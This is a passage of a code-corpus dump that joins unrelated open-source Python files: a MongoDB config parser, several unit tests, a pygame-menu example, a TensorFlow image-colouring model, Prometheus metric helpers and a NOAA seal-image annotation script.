if not a_content:
raise ParseException("mongod.conf is empty or all lines are comments")
self.is_yaml = self._file_type_is_yaml(a_content)
try:
if self.is_yaml:
self.data = yaml.safe_load('\n'.join(content))
else:
self.data = split_kv_pairs(content, use_partition=True)
except Exception as e:
            raise ParseException('mongod conf parse failed: %s' % e)
def _file_type_is_yaml(self, content):
"""
Return True if the file type is YAML.
Return False means this file will be handled in key-value pair format.
Why 0.9?
        A normal key-value pair format file would always have the '='
        in each line. Use 0.9 rather than 1 here, just in case there are
        any unexpected lines with wrong settings.
"""
cnt = sum([1 for line in content if "=" in line])
percent = float(cnt) / len(content)
        return percent < 0.9
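    # Worked example of the heuristic (based on the samples in the module
    # docstring): every active line of the key-value sample contains "=", so
    # the ratio is 1.0 (>= 0.9) and the file is parsed as key-value pairs;
    # none of the YAML sample's lines contain "=", so the ratio is 0.0 (< 0.9)
    # and the file is parsed as YAML.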
@property
def bindip(self):
"""
Return option value of `net.bindIp` if a yaml conf and `bind_ip` if a
key-value pair conf.
"""
if self.is_yaml:
return self.get('net', {}).get('bindIp')
else:
return self.get('bind_ip')
@property
def port(self):
"""
Return option value of `net.port` if a yaml conf and `port` if a
key-value pair conf.
"""
if self.is_yaml:
return self.get('net', {}).get('port')
else:
return self.get('port')
@property
def dbpath(self):
"""
        Return option value of `storage.dbPath` if a yaml conf and `dbpath`
if a key-value pair conf.
"""
if self.is_yaml:
return self.get('storage', {}).get('dbPath') or self.get('storage.dbPath')
else:
return self.get('dbpath')
@property
def fork(self):
"""
Return option value of `processManagement.fork` if a yaml conf and
`fork` if a key-value pair conf.
"""
if self.is_yaml:
return self.get('processManagement', {}).get('fork')
else:
return self.get('fork')
@property
def pidfilepath(self):
"""
Return option value of `processManagement.pidFilePath` if a yaml conf
        and `pidfilepath` if a key-value pair conf.
"""
if self.is_yaml:
return self.get('processManagement', {}).get('pidFilePath')
else:
return self.get('pidfilepath')
@property
def syslog(self):
"""
Return option value of `systemLog.destination` if a yaml conf, this
can be 'file' or 'syslog'. Return value of `syslog` if a key-value pair
conf, 'true' means log to syslog.
Return None means value is not specified in configuration file.
"""
if self.is_yaml:
return self.get('systemLog', {}).get('destination')
else:
return self.get('syslog')
@property
def logpath(self):
"""
Return option value of `systemLog.path` if a yaml conf and `logpath`
if a key-value pair conf.
"""
if self.is_yaml:
return self.get('systemLog', {}).get('path')
else:
return self.get('logpath')
|
test/url_test.py | etrepum/py-nanoid | 256 | 12657779 | <filename>test/url_test.py
from unittest import TestCase
from nanoid.resources import alphabet
class TestURL(TestCase):
def test_has_no_duplicates(self):
for i in range(len(alphabet)):
self.assertEqual(alphabet.rindex(alphabet[i]), i)
def test_is_string(self):
self.assertEqual(type(alphabet), str)
|
ide/tests/test_source_api.py | Ramonrlb/cloudpebble | 147 | 12657791 | import json
import mock
from django.core.urlresolvers import reverse
from ide.utils.cloudpebble_test import CloudpebbleTestCase
from utils.fakes import FakeS3
__author__ = 'joe'
fake_s3 = FakeS3()
@mock.patch('ide.models.s3file.s3', fake_s3)
class TestSource(CloudpebbleTestCase):
"""Tests for the Tests models"""
def setUp(self):
self.login()
def create_file(self, name='file.c', content=None, target=None, success=True):
""" Create a source file """
url = reverse('ide:create_source_file', args=[self.project_id])
data = {}
if name is not None:
data['name'] = name
if content is not None:
data['content'] = content
if target is not None:
data['target'] = target
result = json.loads(self.client.post(url, data).content)
self.assertEqual(result['success'], success)
if success:
self.assertEqual(result['file']['name'], name)
self.assertEqual(result['file']['target'], target if target else 'app')
return result['file'] if 'file' in result else result
def load_file(self, id, success=True):
""" Load a source file's content """
url = reverse('ide:load_source_file', args=[self.project_id, id])
result = json.loads(self.client.get(url).content)
self.assertEqual(result['success'], success)
return result
def rename_file(self, id, modified, old_name=None, new_name=None, success=True):
""" Rename a source file """
url = reverse('ide:rename_source_file', args=[self.project_id, id])
data = {}
if old_name is not None:
data['old_name'] = old_name
if new_name is not None:
data['new_name'] = new_name
if modified is not None:
data['modified'] = modified
result = json.loads(self.client.post(url, data).content)
self.assertEqual(result['success'], success)
return result
def save_file(self, id, modified, content=None, folded_lines='[]', success=True):
""" Save new content to a source file """
data = {}
if content is not None:
data['content'] = content
if folded_lines is not None:
data['folded_lines'] = folded_lines
if modified is not None:
data['modified'] = modified
url = reverse('ide:save_source_file', args=[self.project_id, id])
result = json.loads(self.client.post(url, data).content)
self.assertEqual(result['success'], success)
return result
def get_source_names(self):
""" Get a list of project source file names """
project = json.loads(self.client.get(reverse('ide:project_info', args=[self.project_id])).content)
return {x['name'] for x in project['source_files']}
def test_create(self):
""" Test creating files in various valid states """
self.create_file("c_file.c")
self.create_file("js_file.js")
self.create_file("with_content.c", content="blah" * 100)
self.create_file("without_content.c", content=None)
self.create_file("worker.c", target='worker')
def test_create_load_save(self):
""" Test a full sequence of creating, loading, saving and re-loading a file"""
content = " Hello world ^^ "
new_content = "New content"
info = self.create_file(content=content)
loaded = self.load_file(info['id'])
self.assertEqual(content, loaded['source'])
self.save_file(info['id'], int(loaded['modified']), content=new_content)
loaded = self.load_file(info['id'])
self.assertEqual(new_content, loaded['source'])
def test_create_with_invalid_target_throws_error(self):
""" Test that attempting to create a file with an invalid target throws an error """
self.create_file(target='invalid', success=False)
def test_create_with_invalid_names_throws_error(self):
""" Check that attempts to create files with invalid names throw errors """
self.create_file("no_extension", success=False)
self.create_file("no_extension", success=False)
self.create_file("bad_extension.html", success=False)
self.create_file(".c", success=False)
self.create_file("`unsafe characters`.c", success=False)
def test_rename(self):
""" Check that files can be renamed """
name1 = "name1.c"
name2 = "name2.c"
info = self.create_file(name1)
loaded = self.load_file(info['id'])
self.rename_file(info['id'], int(loaded['modified']), name1, name2)
self.assertIn(name2, self.get_source_names())
def test_rename_outdated_file_fails(self):
""" Check that a file which was modified externally fails to rename """
name1 = "name1.c"
name2 = "name2.c"
info = self.create_file(name1)
loaded = self.load_file(info['id'])
self.rename_file(info['id'], int(loaded['modified'] - 5000), name1, name2, success=False)
self.assertIn(name1, self.get_source_names())
|
pygame_menu/examples/window_resize.py | ppizarror/pygame-menu | 419 | 12657795 | """
pygame-menu
https://github.com/ppizarror/pygame-menu
EXAMPLE - WINDOW RESIZE
Resize the menu when the window is resized.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 <NAME>. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
import pygame
import pygame_menu
pygame.init()
surface = pygame.display.set_mode((600, 400), pygame.RESIZABLE)
pygame.display.set_caption("Example resizable window")
menu = pygame_menu.Menu(
height=100,
theme=pygame_menu.themes.THEME_BLUE,
title='Welcome',
width=100
)
def on_resize() -> None:
"""
    Recompute the menu size when the window has been resized.
"""
window_size = surface.get_size()
new_w, new_h = 0.75 * window_size[0], 0.7 * window_size[1]
menu.resize(new_w, new_h)
print(f'New menu size: {menu.get_size()}')
menu.add.label('Resize the window!')
user_name = menu.add.text_input('Name: ', default='<NAME>', maxchar=10)
menu.add.selector('Difficulty: ', [('Hard', 1), ('Easy', 2)])
menu.add.button('Quit', pygame_menu.events.EXIT)
menu.enable()
on_resize() # Set initial size
if __name__ == '__main__':
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
break
if event.type == pygame.VIDEORESIZE:
# Update the surface
surface = pygame.display.set_mode((event.w, event.h),
pygame.RESIZABLE)
# Call the menu event
on_resize()
# Draw the menu
surface.fill((25, 0, 50))
menu.update(events)
menu.draw(surface)
pygame.display.flip()
|
tests/test_model_counting.py | dannyrohde/pydbantic | 124 | 12657805 | <gh_stars>100-1000
import pytest
from tests.models import EmployeeInfo
@pytest.mark.asyncio
async def test_model_counting(loaded_database_and_model):
db, Employees = loaded_database_and_model
all_employees = await Employees.all()
employee_count = await Employees.count()
print(f"Number of Employees is ", employee_count)
assert employee_count == len(all_employees)
employed = await Employees.filter(
is_employed=True
)
employed_count = await Employees.filter(
is_employed=True,
count_rows=True,
)
assert len(employed) == employed_count
un_employed = await Employees.filter(
is_employed=False,
count_rows=True
)
assert un_employed == 0
|
api/tests/integration/tests/rpe/rpe.py | tsingdao-Tp/Indigo | 204 | 12657813 | <filename>api/tests/integration/tests/rpe/rpe.py
import os
import sys
sys.path.append('../../common')
from env_indigo import *
from itertools import product
indigo = Indigo()
def getProduct(reaction):
for mol in reaction.iterateProducts():
return mol
return None
def loadSdf(sdf_path):
sdfiterator = indigo.iterateSDFile(sdf_path)
result = [m.clone() for m in sdfiterator]
sdfiterator.dispose()
return result
def buildRpeReactions(test_dir):
reaction = indigo.loadQueryReactionFromFile(joinPathPy(os.path.join("tests", test_dir, "reaction.rxn"), __file__))
mons = []
for i in range(reaction.countReactants()):
reactant_mons = loadSdf(joinPathPy(os.path.join("tests", test_dir, "mons{0}.sdf".format(i + 1)), __file__))
mons.append(reactant_mons)
return indigo.reactionProductEnumerate(reaction, mons)
def testRpe():
for test_dir in sorted(os.listdir(joinPathPy("tests", __file__))):
print("Test %s" % test_dir)
rpe_reactions = buildRpeReactions(test_dir)
products_smiles = []
for reaction in rpe_reactions.iterateArray():
rpe_product = getProduct(reaction)
rpe_csmiles = rpe_product.canonicalSmiles()
products_smiles.append(rpe_csmiles)
products_smiles.sort()
for prod_sm in products_smiles:
print(" %s" % prod_sm)
# make possible option combinations
opset = [
product(["rpe-multistep-reactions"], ["0", "1"]), # bug was caused by 1 \
product(["rpe-mode"], ["grid", "one-tube"]),
product(["rpe-self-reaction"], ["0", "1"]),
product(["rpe-max-depth"], ["1", "3"]),
product(["rpe-max-products-count"], ["4", "10"]) # 10 -> 100 very long \
]
# example with bug for test #9
# opset = [ [ ("rpe-multistep-reactions", "1") ] ]
opt_combintations = product(*opset)
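# One element of this product is a full option set, e.g.
# (("rpe-multistep-reactions", "0"), ("rpe-mode", "grid"),
#  ("rpe-self-reaction", "0"), ("rpe-max-depth", "1"),
#  ("rpe-max-products-count", "4"))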
print("Testing reaction products enumberator with different options")
for opt_set in opt_combintations:
print("\n*** Test set ***")
for opt_tuple in opt_set:
print(opt_tuple)
indigo.setOption(*opt_tuple)
testRpe()
|
perf/docker/prom_client.py | daixiang0/tools | 264 | 12657834 | # Copyright Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from prometheus_client import start_http_server, Counter, Gauge
import logging
REQUESTS = Counter(
'stability_outgoing_requests',
'Number of requests from this service.',
['source', 'destination', 'succeeded']
)
RUNNING = Gauge(
'stability_test_instances',
'Is this test running',
['test']
)
def report_metrics():
start_http_server(8080)
def report_running(test):
RUNNING.labels(test).set_function(lambda: 1)
def attempt_request(f, source, destination, valid=None):
try:
response = f()
if not valid or valid(response):
succeeded = True
else:
succeeded = False
logging.error(
"Request from {} to {} had invalid response: {}".format(
source, destination, response))
REQUESTS.labels(source, destination, succeeded).inc()
return response, succeeded
except BaseException:
logging.exception("Request from {} to {} had an exception".format(
source,
destination
))
REQUESTS.labels(source, destination, False).inc()
return None, False
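# Example wiring (a sketch only; the service names and URL below are made up):
#
#   import requests
#   report_metrics()                     # expose Prometheus metrics on :8080
#   report_running("http-stability")
#   attempt_request(
#       lambda: requests.get("http://echo:8080/"),
#       source="client", destination="echo",
#       valid=lambda resp: resp.status_code == 200)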
|
ImageArt/ImageColoring.py | shekkizh/TensorflowProjects | 204 | 12657835 | <gh_stars>100-1000
__author__ = 'Charlie'
"""Image coloring by fully convolutional networks - incomplete """
import numpy as np
import tensorflow as tf
import os, sys, inspect
from datetime import datetime
import scipy.misc as misc
lib_path = os.path.realpath(
os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "..")))
if lib_path not in sys.path:
sys.path.insert(0, lib_path)
import TensorflowUtils as utils
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("data_dir", "Data_zoo/CIFAR10_data/", """Path to the CIFAR10 data""")
tf.flags.DEFINE_string("mode", "train", "Network mode train/ test")
tf.flags.DEFINE_string("test_image_path", "", "Path to test image - read only if mode is test")
tf.flags.DEFINE_integer("batch_size", "128", "train batch size")
tf.flags.DEFINE_string("logs_dir", "logs/ImageColoring_logs/", """Path to save logs and checkpoint if needed""")
DATA_URL = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
LEARNING_RATE = 1e-3
MAX_ITERATIONS = 100001
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 20000
IMAGE_SIZE = 32
def read_cifar10(filename_queue):
class CIFAR10Record(object):
pass
result = CIFAR10Record()
label_bytes = 1
result.height = IMAGE_SIZE
result.width = IMAGE_SIZE
result.depth = 3
image_bytes = result.height * result.width * result.depth
record_bytes = label_bytes + image_bytes
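    # Each CIFAR-10 record is 1 label byte followed by 32*32*3 = 3072 image
    # bytes (3073 bytes total), stored depth-major (channel, row, column).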
reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)
result.key, value = reader.read(filename_queue)
record_bytes = tf.decode_raw(value, tf.uint8)
depth_major = tf.cast(tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]),
[result.depth, result.height, result.width]), tf.float32)
image = tf.transpose(depth_major, [1, 2, 0])
# extended_image = tf.reshape(image, (result.height, result.width, result.depth))
result.color_image = image
print result.color_image.get_shape()
print "Converting image to gray scale"
    result.gray_image = (0.21 * result.color_image[:, :, 2] +
                         0.72 * result.color_image[:, :, 1] +
                         0.07 * result.color_image[:, :, 0])
result.gray_image = tf.expand_dims(result.gray_image, 2)
print result.gray_image.get_shape()
return result
def get_image(image_dir):
image = misc.imread(image_dir)
image = np.ndarray.reshape(image.astype(np.float32), ((1,) + image.shape))
return image
def inputs():
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]
for f in filenames:
if not tf.gfile.Exists(f):
raise ValueError('Failed to find file: ' + f)
filename_queue = tf.train.string_input_producer(filenames)
read_input = read_cifar10(filename_queue)
num_preprocess_threads = 8
min_queue_examples = int(0.4 * NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN)
print "Shuffling"
input_gray, input_colored = tf.train.shuffle_batch([read_input.gray_image, read_input.color_image],
batch_size=FLAGS.batch_size,
num_threads=num_preprocess_threads,
capacity=min_queue_examples + 3 * FLAGS.batch_size,
min_after_dequeue=min_queue_examples)
input_gray = (input_gray - 128) / 255.0
input_colored = (input_colored - 128) / 255.0
return input_gray, input_colored
def inference(image):
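    # Encoder-decoder sketch: a 9x9 conv (1->32 channels), two stride-2 convs
    # (32->64->128), two stride-2 transposed convs back up (128->64->32), and
    # a final 9x9 conv to 3 channels with tanh, so the output matches the
    # spatial size of the grayscale input.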
W1 = utils.weight_variable_xavier_initialized([9, 9, 1, 32])
b1 = utils.bias_variable([32])
tf.histogram_summary("W1", W1)
tf.histogram_summary("b1", b1)
h_conv1 = tf.nn.relu(utils.conv2d_basic(image, W1, b1))
W2 = utils.weight_variable_xavier_initialized([3, 3, 32, 64])
b2 = utils.bias_variable([64])
tf.histogram_summary("W2", W2)
tf.histogram_summary("b2", b2)
h_conv2 = tf.nn.relu(utils.conv2d_strided(h_conv1, W2, b2))
W3 = utils.weight_variable_xavier_initialized([3, 3, 64, 128])
b3 = utils.bias_variable([128])
tf.histogram_summary("W3", W3)
tf.histogram_summary("b3", b3)
h_conv3 = tf.nn.relu(utils.conv2d_strided(h_conv2, W3, b3))
# upstrides
W4 = utils.weight_variable_xavier_initialized([3, 3, 64, 128])
b4 = utils.bias_variable([64])
tf.histogram_summary("W4", W4)
tf.histogram_summary("b4", b4)
h_conv4 = tf.nn.relu(utils.conv2d_transpose_strided(h_conv3, W4, b4))
W5 = utils.weight_variable_xavier_initialized([3, 3, 32, 64])
b5 = utils.bias_variable([32])
tf.histogram_summary("W5", W5)
tf.histogram_summary("b5", b5)
h_conv5 = tf.nn.relu(utils.conv2d_transpose_strided(h_conv4, W5, b5))
W6 = utils.weight_variable_xavier_initialized([9, 9, 32, 3])
b6 = utils.bias_variable([3])
tf.histogram_summary("W6", W6)
tf.histogram_summary("b6", b6)
pred_image = tf.nn.tanh(utils.conv2d_basic(h_conv5, W6, b6))
return pred_image
def loss(pred, colored):
rmse = tf.sqrt(2 * tf.nn.l2_loss(tf.sub(colored, pred))) / FLAGS.batch_size
tf.scalar_summary("RMSE", rmse)
return rmse
def train(loss_val, step):
learning_rate = tf.train.exponential_decay(LEARNING_RATE, step, 0.4 * MAX_ITERATIONS, 0.99)
train_op = tf.train.AdamOptimizer(learning_rate).minimize(loss_val, global_step=step)
return train_op
def main(argv=None):
utils.maybe_download_and_extract(FLAGS.data_dir, DATA_URL, is_tarfile=True)
print "Setting up model..."
global_step = tf.Variable(0,trainable=False)
gray, color = inputs()
pred = 255 * inference(gray) + 128
tf.image_summary("Gray", gray, max_images=1)
tf.image_summary("Ground_truth", color, max_images=1)
tf.image_summary("Prediction", pred, max_images=1)
image_loss = loss(pred, color)
train_op = train(image_loss, global_step)
summary_op = tf.merge_all_summaries()
with tf.Session() as sess:
print "Setting up summary writer, queue, saver..."
sess.run(tf.initialize_all_variables())
summary_writer = tf.train.SummaryWriter(FLAGS.logs_dir, sess.graph)
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(FLAGS.logs_dir)
if ckpt and ckpt.model_checkpoint_path:
print "Restoring model from checkpoint..."
saver.restore(sess, ckpt.model_checkpoint_path)
tf.train.start_queue_runners(sess)
for step in xrange(MAX_ITERATIONS):
if step % 400 == 0:
loss_val, summary_str = sess.run([image_loss, summary_op])
print "Step %d, Loss: %g" % (step, loss_val)
summary_writer.add_summary(summary_str, global_step=step)
if step % 1000 == 0:
saver.save(sess, FLAGS.logs_dir + "model.ckpt", global_step=step)
print "%s" % datetime.now()
sess.run(train_op)
if __name__ == "__main__":
tf.app.run()
|
rfhub/blueprints/__init__.py | datakurre/robotframework-hub | 156 | 12657867 | <filename>rfhub/blueprints/__init__.py<gh_stars>100-1000
from rfhub.blueprints.api import blueprint as api
from rfhub.blueprints.dashboard import blueprint as dashboard
from rfhub.blueprints.doc import blueprint as doc
|
tests/app/no_metadata.py | sandutsar/voila | 2,977 | 12657870 | import pytest
NOTEBOOK_PATH = 'no_metadata.ipynb'
@pytest.fixture
def non_existing_notebook_metadata(base_url):
return base_url + f'voila/render/{NOTEBOOK_PATH}'
@pytest.fixture
def voila_args(notebook_directory, voila_args_extra):
return ['--VoilaTest.root_dir=%r' % notebook_directory] + voila_args_extra
async def test_non_existing_metadata(
http_server_client, non_existing_notebook_metadata
):
response = await http_server_client.fetch(non_existing_notebook_metadata)
assert response.code == 200
assert 'Executing without notebook metadata' in response.body.decode('utf-8')
|
tests/opytimizer/optimizers/science/test_mvo.py | anukaal/opytimizer | 528 | 12657875 | <filename>tests/opytimizer/optimizers/science/test_mvo.py
import numpy as np
from opytimizer.optimizers.science import mvo
from opytimizer.spaces import search
def test_mvo_params():
params = {
'WEP_min': 0.2,
'WEP_max': 1.0,
'p': 0.5
}
new_mvo = mvo.MVO(params=params)
assert new_mvo.WEP_min == 0.2
assert new_mvo.WEP_max == 1.0
assert new_mvo.p == 0.5
def test_mvo_params_setter():
new_mvo = mvo.MVO()
try:
new_mvo.WEP_min = 'a'
except:
new_mvo.WEP_min = 0.75
try:
new_mvo.WEP_min = -1
except:
new_mvo.WEP_min = 0.75
assert new_mvo.WEP_min == 0.75
try:
new_mvo.WEP_max = 'b'
except:
new_mvo.WEP_max = 0.9
try:
new_mvo.WEP_max = 0.1
except:
new_mvo.WEP_max = 0.9
try:
new_mvo.WEP_max = -1
except:
new_mvo.WEP_max = 0.9
assert new_mvo.WEP_max == 0.9
try:
new_mvo.p = 'c'
except:
new_mvo.p = 0.25
try:
new_mvo.p = -1
except:
new_mvo.p = 0.25
assert new_mvo.p == 0.25
def test_mvo_update():
def square(x):
return np.sum(x**2)
new_mvo = mvo.MVO()
search_space = search.SearchSpace(n_agents=2, n_variables=2,
lower_bound=[1, 1], upper_bound=[10, 10])
new_mvo.update(search_space, square, 1, 10)
new_mvo.update(search_space, square, 5, 10)
|
dev/examples/snapswig-check.py | Cam2337/snap-python | 242 | 12657904 | #!/usr/bin/python
# test-bfsdfs.py
#
# Author: <NAME>, Spring 2013
# Description:
# - Loads SNAP as a Python module.
# - Performs mini unit tests for the following functions:
#   - gviz (graph visualization, using Graphviz)
#   - bfsdfs (Breadth/Depth First Search)
import sys
sys.path.append("../swig-r")
import snap
import os
import unittest
def GVizTest(NNodes, NEdges):
Graph = snap.GenRndGnm(NNodes, NEdges, 1)
FName = "test.png"
snap.DrawGViz(Graph, 1, snap.TStr(FName),
snap.TStr("Snap Ringo Dot"), 1)
return os.path.exists(FName)
def BfsDfsTest(NNodes, NEdges):
Graph = snap.GenRndGnm(NNodes, NEdges, 1)
snap.GetBfsTree(Graph, False, False, 1)
G2 = snap.GetBfsTree(Graph, False, False, 1)
return G2
class GVizTests(unittest.TestCase):
def testOne(self):
NNodes, NEdges = (15, 25)
self.failUnless(GVizTest(NNodes, NEdges))
def testTwo(self):
NNodes, NEdges = (8242, 12424)
G = BfsDfsTest(NNodes, NEdges)
self.assertEqual(NNodes == G.GetNodes(), NEdges == G.GetEdges())
def main():
unittest.main()
if __name__ == "__main__":
main()
|
data_management/importers/noaa_seals_2019.py | dnarqq/WildHack | 402 | 12657911 | <filename>data_management/importers/noaa_seals_2019.py
#%% Imports and constants
import os
import pandas as pd
from tqdm import tqdm
# from github.com/microsoft/ai4eutils
import url_utils
# from github.com/microsoft/cameratraps
from visualization import visualization_utils
# A list of files in the lilablobssc container for this data set
container_file_list = r'C:\temp\seals\seal_files.txt'
# The raw detection files provided by NOAA
detections_fn = r'C:\temp\seals\surv_test_kamera_detections_20210212.csv'
# A version of the above with filename columns added
detections_fn_full_paths = detections_fn.replace('.csv','_full_paths.csv')
base_url = 'https://lilablobssc.blob.core.windows.net/noaa-kotz'
#%% Read input .csv
df = pd.read_csv(detections_fn)
df['rgb_image_path'] = ''
df['ir_image_path'] = ''
print('Read {} rows from {}'.format(len(df),detections_fn))
camera_view_to_path = {}
camera_view_to_path['C'] = 'CENT'
camera_view_to_path['L'] = 'LEFT'
valid_flights = set(['fl04','fl05','fl06','fl07'])
#%% Read list of files
with open(container_file_list,'r') as f:
all_files = f.readlines()
all_files = [s.strip() for s in all_files]
all_files = set(all_files)
#%% Convert paths to full paths
missing_ir_files = []
# i_row = 0; row = df.iloc[i_row]
for i_row,row in tqdm(df.iterrows(),total=len(df)):
assert row['flight'] in valid_flights
assert row['camera_view'] in camera_view_to_path
assert isinstance(row['rgb_image_name'],str)
rgb_image_path = 'Images/{}/{}/{}'.format(row['flight'],camera_view_to_path[row['camera_view']],
row['rgb_image_name'])
assert rgb_image_path in all_files
df.loc[i_row,'rgb_image_path'] = rgb_image_path
if not isinstance(row['ir_image_name'],str):
continue
ir_image_path = 'Images/{}/{}/{}'.format(row['flight'],camera_view_to_path[row['camera_view']],
row['ir_image_name'])
# assert ir_image_path in all_files
if ir_image_path not in all_files:
missing_ir_files.append(ir_image_path)
df.loc[i_row,'ir_image_path'] = ir_image_path
# ...for each row
missing_ir_files = list(set(missing_ir_files))
missing_ir_files.sort()
print('{} missing IR files (of {})'.format(len(missing_ir_files),len(df)))
for s in missing_ir_files:
print(s)
#%% Write results
df.to_csv(detections_fn_full_paths,index=False)
#%% Load output file, just to be sure
df = pd.read_csv(detections_fn_full_paths)
#%% Render annotations on an image
import random; i_image = random.randint(0,len(df))
# i_image = 2004
row = df.iloc[i_image]
rgb_image_path = row['rgb_image_path']
rgb_image_url = base_url + '/' + rgb_image_path
ir_image_path = row['ir_image_path']
ir_image_url = base_url + '/' + ir_image_path
#%% Download the image
rgb_image_fn = url_utils.download_url(rgb_image_url,progress_updater=True)
ir_image_fn = url_utils.download_url(ir_image_url,progress_updater=True)
#%% Find all the rows (detections) associated with this image
# as l,r,t,b
rgb_boxes = []
ir_boxes = []
for i_row,row in df.iterrows():
if row['rgb_image_path'] == rgb_image_path:
box_l = row['rgb_left']
box_r = row['rgb_right']
box_t = row['rgb_top']
box_b = row['rgb_bottom']
rgb_boxes.append([box_l,box_r,box_t,box_b])
if row['ir_image_path'] == ir_image_path:
box_l = row['ir_left']
box_r = row['ir_right']
box_t = row['ir_top']
box_b = row['ir_bottom']
ir_boxes.append([box_l,box_r,box_t,box_b])
print('Found {} RGB, {} IR annotations for this image'.format(len(rgb_boxes),
len(ir_boxes)))
#%% Render the detections on the image(s)
img_rgb = visualization_utils.load_image(rgb_image_fn)
img_ir = visualization_utils.load_image(ir_image_fn)
for b in rgb_boxes:
# In pixel coordinates
box_left = b[0]; box_right = b[1]; box_top = b[2]; box_bottom = b[3]
assert box_top > box_bottom; assert box_right > box_left
ymin = box_bottom; ymax = box_top; xmin = box_left; xmax = box_right
visualization_utils.draw_bounding_box_on_image(img_rgb,ymin,xmin,ymax,xmax,
use_normalized_coordinates=False,
thickness=3)
for b in ir_boxes:
# In pixel coordinates
box_left = b[0]; box_right = b[1]; box_top = b[2]; box_bottom = b[3]
assert box_top > box_bottom; assert box_right > box_left
ymin = box_bottom; ymax = box_top; xmin = box_left; xmax = box_right
visualization_utils.draw_bounding_box_on_image(img_ir,ymin,xmin,ymax,xmax,
use_normalized_coordinates=False,
thickness=3)
visualization_utils.show_images_in_a_row([img_rgb,img_ir])
#%% Save images
img_rgb.save(r'c:\temp\seals_rgb.png')
img_ir.save(r'c:\temp\seals_ir.png')
#%% Clean up
import shutil
tmp_dir = os.path.dirname(rgb_image_fn)
assert 'ai4eutils' in tmp_dir
shutil.rmtree(tmp_dir)
|
notebook/dir_builtins.py | vhn0912/python-snippets | 174 | 12657912 | import pprint
print(type(dir(__builtins__)))
# <class 'list'>
print(len(dir(__builtins__)))
# 153
pprint.pprint(dir(__builtins__), compact=True)
# ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException',
# 'BlockingIOError', 'BrokenPipeError', 'BufferError', 'BytesWarning',
# 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError',
# 'ConnectionRefusedError', 'ConnectionResetError', 'DeprecationWarning',
# 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False',
# 'FileExistsError', 'FileNotFoundError', 'FloatingPointError', 'FutureWarning',
# 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError',
# 'IndexError', 'InterruptedError', 'IsADirectoryError', 'KeyError',
# 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError',
# 'NameError', 'None', 'NotADirectoryError', 'NotImplemented',
# 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', 'StopAsyncIteration',
# 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit',
# 'TabError', 'TimeoutError', 'True', 'TypeError', 'UnboundLocalError',
# 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError',
# 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError',
# 'Warning', 'ZeroDivisionError', '__IPYTHON__', '__build_class__', '__debug__',
# '__doc__', '__import__', '__loader__', '__name__', '__package__', '__spec__',
# 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
print(dir(__builtins__)[0])
# ArithmeticError
print(type(dir(__builtins__)[0]))
# <class 'str'>
pprint.pprint([s for s in dir(__builtins__) if s.islower() and not s.startswith('_')], compact=True)
# ['abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
